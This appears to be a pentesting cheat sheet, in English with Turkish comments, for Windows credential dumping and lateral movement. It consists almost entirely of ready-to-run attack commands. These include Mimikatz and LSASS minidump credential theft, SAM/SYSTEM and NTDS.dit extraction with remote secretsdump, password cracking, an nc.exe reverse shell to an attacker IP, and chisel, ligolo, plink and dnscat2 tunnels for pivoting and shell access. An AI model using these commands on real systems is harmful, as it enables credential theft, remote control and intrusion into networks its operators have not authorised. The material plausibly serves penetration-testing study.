Windows Lateral Movement

Mimikatz

Link: https://github.com/ParrotSec/mimikatz

# Local User Hashlerini verir
./mimikatz.exe "token::elevate" "lsadump::sam" "exit"
# LSA hashlerini verir
./mimikatz.exe "token::elevate" "lsadump::lsa /patch" "exit"
# Cachelenmiş credentiallar
./mimikatz.exe "token::elevate" "lsadump::secrets" "exit"

# Oturum açan kullanıcıların hashlerini verir
./mimikatz.exe "token::elevate" "sekurlsa::logonpasswords" "exit"
./mimikatz.exe "token::elevate" "sekurlsa::tickets" "exit"

privilege::debug # Yetki kontrolü
token::elevate # Yetki yükseltme

hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

LSADump

Open Task Manager > Select the Processes tab > Find & right click the Local Security Authority Process > Select Create dump file

# Lsaas process id buluyoruz
tasklist /svc
Get-Process lsass

# Minidump lsa alıyoruz
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full

# Kali üzerinde okuyoruz
pypykatz lsa minidump lsass.dmp 

Hash Dumping

reg save hklm\system system
reg save hklm\sam sam
reg save hklm\security security

impacket-secretsdump -sam sam -system system local

john --format=NT hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
hashcat -a3 -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt

keepass2john Database.kdbx > hash.txt
hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force

NTDS.Dit Dump (Domain Controller)

vssadmin CREATE SHADOW /For=C:
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit

impacket-secretsdump -ntds NTDS.dit LOCAL

# Remote
impacket-secretsdump administrator:'password123'@192.168.1.1 -just-dc

Ligolo

./proxy -selfcert -laddr 0.0.0.0:443
./agent.exe -ignore-cert -connect 192.168.1.2:443

interface_create --name ligolo
route_add --name ligolo --route 240.0.0.1/32 # Localhost 
route_add --name ligolo --route 10.0.0.1/24 # Subnet
tunnel_start # Tünellemeyi başlatır

# Hedefte 1234 portunu açar ve dinler istekleri bizdeki 4321'e yönlendirir.
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp

Chisel

./chisel server --port 8081 --reverse # Kali

./chisel client 192.168.1.2:8081 R:socks &> /tmp/output # Target
mousepad /etc/proxychains4.conf
socks5 127.0.0.1 1080

./chisel client 192.168.1.2:8081 R:3307:127.0.0.1:3306 # Hedef:3306 > Kali:3307


# Hedefte Shell için Port Açma
./chisel server --port 8081 --reverse # Hedef
./chisel client 192.168.1.3:8081 R:8080:0.0.0.0:80 # Kali:8080 > Hedef:80

Port Forwarding

# Local
systemctl start ssh
mousepad /etc/proxychains4.conf
#socks5 127.0.0.1 9999

# SSH Tunneling
ssh -N -R 9999 root@192.168.1.2
proxychains nmap -v -sT -Pn -n 172.168.1.3

# Plink Tunnel
C:\Windows\Temp\nc.exe -e cmd.exe 192.168.1.2 1234
C:\Windows\Temp\plink.exe -ssh -l root -pw root -R 127.0.0.1:3390:127.0.0.1:3389 192.168.1.3
nmap -sT -p 3390 127.0.0.1


# Netsh Tunnel (Local Admin Gerekir)
netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.1.3 connectport=22 connectaddress=10.0.0.4
netsh interface portproxy show all
netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.1.3 localport=2222 action=allow
ssh database_admin@192.168.1.3 -p 2222
netsh advfirewall firewall delete rule name="port_forward_ssh_2222"
netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.50.64

# Meterpreter
portfwd add -l 1234 -p 80 -r 10.0.0.1/24

DNS Tunneling

ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache

Import-Module .\dnscat2.ps1
Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd

dnscat2> window -i 1